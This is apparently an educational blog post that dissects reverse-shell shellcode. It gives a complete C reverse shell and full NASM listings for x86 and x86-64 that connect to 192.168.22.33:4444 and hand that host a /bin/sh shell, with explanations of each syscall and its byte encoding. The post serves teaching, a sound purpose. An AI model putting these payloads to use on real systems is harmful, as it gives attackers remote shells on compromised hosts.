A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position-independent, as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both to save space in this post and because most shellcode does not handle errors anyway.

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

void reverse_shell() {
  /* Allocate a socket for IPv4/TCP (1) */
  int sock = socket(AF_INET, SOCK_STREAM, 0);

  /* Set up the connection structure. (2) */
  struct sockaddr_in sin;
  sin.sin_family = AF_INET;
  sin.sin_port = htons(4444);

  /* Parse the IP address (3) */
  inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr);

  /* Connect to the remote host (4) */
  connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));

  /* Duplicate the socket to STDIO (5) */
  dup2(sock, STDIN_FILENO);
  dup2(sock, STDOUT_FILENO);
  dup2(sock, STDERR_FILENO);

  /* Set up and execute a shell. (6) */
  char *argv[] = {"/bin/sh", NULL};
  execve("/bin/sh", argv, NULL);
}
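
To make steps (2) and (3) concrete, here is a small sketch that shows which bytes htons and inet_pton actually place in the structure. The helper name endpoint_bytes is my own invention for illustration and is not part of any library; it copies out only the port and address fields, since those are the parts stored in network byte order.

```c
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <string.h>

/* Hypothetical helper (not a library function): writes the 2 port bytes
 * followed by the 4 address bytes, exactly as they sit in a
 * struct sockaddr_in. Returns 0 on success, -1 if `ip` does not parse. */
int endpoint_bytes(const char *ip, unsigned short port, unsigned char out[6]) {
  struct sockaddr_in sin;

  assert(ip != NULL && out != NULL);
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(port); /* host order -> network (big-endian) order */

  /* inet_pton returns 1 only when the string is a valid IPv4 address. */
  if (inet_pton(AF_INET, ip, &sin.sin_addr) != 1)
    return -1;

  memcpy(out, &sin.sin_port, 2);
  memcpy(out + 2, &sin.sin_addr.s_addr, 4);
  return 0;
}
```

For 192.168.22.33 and port 4444, the six bytes come out as 11 5c c0 a8 16 21. These are the same bytes the assembly versions have to reproduce by hand.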

Reverse Shell Steps

As can be seen, there are six steps in setting up a reverse shell. Once they are understood, the function can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On 32-bit x86 Linux, it has traditionally wrapped a system call named socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket operations are distinct system calls, so this invokes the socket system call directly. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP; it would be SOCK_DGRAM for UDP). It returns an integer that is a file descriptor for the socket.
  2. Next, we need to set up a struct sockaddr_in, which includes the family (AF_INET again) and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse the string form into the struct. In a struct sockaddr_in, the address is a 4-byte value, again in network byte order.
  4. We now have the full structure set up, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, and STDERR. Like so many of these functions, dup2() is a thin wrapper around a system call.
  6. Finally, we set up the arguments for our shell and launch it with execve, yet another system call. This one replaces the current binary image with the targeted binary (/bin/sh) and then executes it from the entry point. The shell runs with its standard input, output, and error connected to the network socket.
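
Step 5 is the one that tends to surprise people, so here is a sketch of dup2 on its own, using a pipe instead of a socket so that it runs without any network. The function write_via_dup2 is a hypothetical helper of mine: it points an arbitrary descriptor number at a pipe, writes through that number, and reads the data back from the other end.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: redirect `target_fd` onto a fresh pipe with dup2,
 * write `msg` through target_fd, then read it back from the pipe.
 * `msg` should be short (well under the pipe buffer size).
 * Returns the number of bytes read, or -1 on failure. */
ssize_t write_via_dup2(int target_fd, const char *msg, char *buf, size_t buflen) {
  int fds[2];

  assert(msg != NULL && buf != NULL);
  if (pipe(fds) != 0)
    return -1;

  /* Remember what target_fd referred to (if anything) so we can restore it. */
  int saved = dup(target_fd);

  /* After this call, target_fd and fds[1] name the same pipe write end. */
  if (dup2(fds[1], target_fd) < 0) {
    if (saved >= 0)
      close(saved);
    close(fds[0]);
    close(fds[1]);
    return -1;
  }

  ssize_t written = write(target_fd, msg, strlen(msg));

  /* Undo the redirection and close every write end so read() cannot block. */
  if (saved >= 0) {
    dup2(saved, target_fd);
    close(saved);
  } else {
    close(target_fd);
  }
  close(fds[1]);

  ssize_t n = (written < 0) ? -1 : read(fds[0], buf, buflen);
  close(fds[0]);
  return n;
}
```

Calling write_via_dup2(100, "hello", buf, sizeof buf) returns 5 and leaves "hello" in buf, even though nothing was ever opened as descriptor 100. The reverse shell relies on the same mechanism, with the descriptor numbers 0, 1, and 2 and a socket in place of the pipe.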

Why not shellcode in C?

So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position-independent code (-pie -fPIE in gcc), this code will still contain many library calls. In a normal program this is no problem, as it will be linked with the C library and run fine. However, that relies on the loader doing the right thing, including setting up the PLT and GOT. When we inject shellcode, we inject only the machine code, not the data areas that hold the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, so the code will be unable to reference them. (Unless we inject that section as well and fix up the relative addresses, but in that case the complexity of our loader approaches the complexity of our entire shellcode.)

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.

; Do the steps to set up a socket (1)
; SYS_socket = 1
mov ebx, 1
; Set up the arguments to socket() on the stack.
push 0  ; protocol = 0
push 1  ; SOCK_STREAM = 1
push 2  ; AF_INET = 2
; Move a pointer to these values to ecx for socketcall.
mov ecx, esp
; We're calling SYS_SOCKETCALL
mov eax, 0x66
; Get the socket
int 0x80

; Time to set up the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
push 0x2116a8c0
; push the port as a short in network byte order
; 4444 = 0x115c
mov ebx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov ebx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov ebx, esp
; Push size of the struct
push 0x10
; Push address of the struct
push ebx
; Push the socketfd
push eax
; Put the pointer into ecx
mov ecx, esp
; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL)
mov ebx, 0x3
; Preserve sockfd
push eax
; Call SYS_SOCKETCALL
mov eax, 0x66
; Make the connection
int 0x80

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop ebx
; STDERR
mov ecx, 2
; Calling SYS_DUP2 = 0x3f
mov eax, 0x3f
; Syscall!
int 0x80
; move to STDOUT
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80
; move to STDIN
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80

; Now time to execve (6)
; push "/bin/sh\0" on the stack
push 0x68732f
push 0x6e69622f
; preserve filename
mov ebx, esp
; array of arguments
xor eax, eax
push eax
push ebx
; pointer to array in ecx
mov ecx, esp
; null envp
xor edx, edx
; call SYS_execve = 0xb
mov eax, 0xb
; execute the shell!
int 0x80
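
The immediates in that listing (0x2116a8c0, 0x5c11, 0x6e69622f, 0x68732f) look scrambled because x86 stores multi-byte values little-endian: the lowest byte of the immediate lands at the lowest address. Here is a small sketch for deriving them; push_imm32 is a hypothetical helper name of my own, not something from NASM or any library.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: returns the 32-bit immediate that, once stored by a
 * little-endian x86 push, leaves bytes[0..len) in memory in that order.
 * Missing bytes (len < 4) are zero, which doubles as a string terminator. */
uint32_t push_imm32(const unsigned char *bytes, size_t len) {
  uint32_t value = 0;

  assert(bytes != NULL && len <= 4);
  for (size_t i = 0; i < len; i++)
    value |= (uint32_t)bytes[i] << (8 * i); /* byte i goes to bits 8i..8i+7 */
  return value;
}
```

Feeding it the address bytes {192, 168, 22, 33} yields 0x2116a8c0, the port bytes {0x11, 0x5c} yield 0x5c11, and the strings "/bin" and "/sh" yield 0x6e69622f and 0x0068732f respectively.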

Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

; Do the steps to set up a socket (1)
; Set up the arguments to socket() in the appropriate registers
xor rdx, rdx  ; protocol = 0
mov rsi, 1    ; SOCK_STREAM = 1
mov rdi, 2    ; AF_INET = 2
; We're calling SYS_socket = 41
mov rax, 41
; Get the socket
syscall

; Time to set up the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
; (in 64-bit mode this pushes 8 bytes; the upper 4 are zero)
push 0x2116a8c0
; push the port as a short in network byte order
; 4444 = 0x115c
mov bx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov bx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov rsi, rsp
; size of the struct
mov rdx, 0x10
; Our socket fd
mov rdi, rax
; Preserve sockfd
push rax
; Call SYS_connect = 42
mov rax, 42
; Make the connection
syscall

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop rdi
; STDERR
mov rsi, 2
; Calling SYS_dup2 = 0x21
mov rax, 0x21
; Syscall!
syscall
; move to STDOUT
dec rsi
; Reload rax (the return value overwrote it)
mov rax, 0x21
; Syscall!
syscall
; move to STDIN
dec rsi
; Reload rax
mov rax, 0x21
; Syscall!
syscall

; Now time to execve (6)
; push "/bin/sh\0" on the stack as a single 8-byte value; two 32-bit
; immediates would each be widened to 8 bytes and leave "/bin\0" instead
mov rax, 0x0068732f6e69622f
push rax
; preserve filename
mov rdi, rsp
; array of arguments (rdx = 0 also serves as the null envp)
xor rdx, rdx
push rdx
push rdi
; pointer to array in rsi
mov rsi, rsp
; call SYS_execve = 59
mov rax, 59
; execute the shell!
syscall
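
One detail deserves care when porting from 32-bit to 64-bit: in 64-bit mode a push always moves eight bytes, and a 32-bit immediate is sign-extended to fill them. Two consecutive immediate pushes therefore no longer produce eight contiguous string bytes. The sketch below models that behaviour in plain C; both function names are hypothetical helpers of mine, written only to illustrate the byte layout.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pack up to 8 characters into the 64-bit value that,
 * stored little-endian, spells the string in memory (zero padded). */
uint64_t pack_le64(const char *s) {
  size_t len = strlen(s);
  uint64_t value = 0;

  assert(len <= 8);
  for (size_t i = 0; i < len; i++)
    value |= (uint64_t)(unsigned char)s[i] << (8 * i);
  return value;
}

/* Hypothetical helper: model what `push imm32` stores in 64-bit mode.
 * The immediate is sign-extended to 64 bits and written little-endian
 * into an 8-byte stack slot. */
void push_imm32_64bit(unsigned char slot[8], int32_t imm) {
  uint64_t widened = (uint64_t)(int64_t)imm; /* sign extension */

  for (int i = 0; i < 8; i++)
    slot[i] = (unsigned char)(widened >> (8 * i));
}
```

Modelling a push of 0x68732f followed by a push of 0x6e69622f leaves the bytes "/bin" followed by four zero bytes at the top of the stack, so the string ends there. Packing "/bin/sh" with pack_le64 instead gives 0x0068732f6e69622f, which fits in one register and one push.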

Conclusion

The structural similarities between either assembly implementation and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate to the assembly for the shellcode. I’m a bit of a control freak, so whenever I need custom shellcode, I go straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.